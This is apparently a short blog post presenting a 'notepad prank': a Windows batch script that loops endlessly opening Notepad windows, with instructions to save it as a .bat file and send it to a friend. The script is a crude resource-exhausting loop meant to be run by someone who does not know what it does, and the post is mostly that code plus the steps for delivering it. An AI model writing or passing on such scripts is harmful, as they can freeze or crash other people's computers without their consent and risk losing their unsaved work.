![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6K0vtYMXmH9LPeKzt_H7bHM5L5lyvjriacRNxAsd-YuCfMAEXMl8yvxbwifBXsJoR4NNfPyFrybS-vNlqmOfZcqQ_f2b-9sQlDJIGpKufmpxqJtmMM2_YLRjf1DoPBk5tMTgbN57ncGg1/s320/microsoft+Notepad+2007.png)
This is a simple notepad trick. This simple computer prank consists of a code below that will drive your friend crazy as it opens notepad continuously.
- Open the notepad and just copy the code bellow.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
- And save the it as anyname.bat
- Now send this to your friend.
No comments:
Post a Comment